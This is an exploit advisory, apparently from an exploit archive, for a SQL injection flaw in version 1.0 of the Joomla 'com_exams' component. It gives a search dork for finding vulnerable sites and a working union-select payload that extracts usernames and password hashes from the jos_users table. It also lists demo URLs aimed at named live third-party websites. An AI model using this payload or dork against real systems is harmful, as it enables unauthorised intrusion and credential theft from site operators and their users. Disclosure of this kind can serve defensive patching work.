The Joomla Exams component version 1.0 suffers from a remote SQL injection vulnerability.
7fb72204c3db8f49d29fed16f3f3841fc7d5fcb950c63588c54bdc61422ef727
##############################################################################################################################Joomla
component "com_exams"SQL injection vulnerability#########################
##########################Xploited by :
Prince_Pwn3r
###########################
##########################Component Version : 1.0
###########################
##########################Dork :
inurl:"index.php?option=com_exams"
###########################
##########################Contact : 2p0wn0rn0t2p0wn[at]gmail.com
###########################
------------------------------------------------------------------------------------------------------------
Exploit:
www.site.com/index.php?option=com_exams&Itemid=27&task=displayExams&id=[SQLinj]
SQLinj:
-99999+AND+1=0+union+all+select%201,2,3,group_concat(username,0x3a,password),5,6+from+jos_users--
Demo:
https://www.ffri.hr/index.php?option=com_exams&Itemid=27&task=displayExams&id=-99999+AND+1=0+union+all+select%201,2,3,group_concat(username,0x3a,password),5,6+from+jos_users--
<http://graficacreativa.com.mx/index.php?option=com_global&task=gallery&id=9>-------------------------------------------------------------------------------------------------------------
Greetz to all p0wnbox.com members,N0F4T3,JohnTG,Sol,AnalyseR and to all
friends out there.
-----------------------------------------------+-------------------------------------------------------------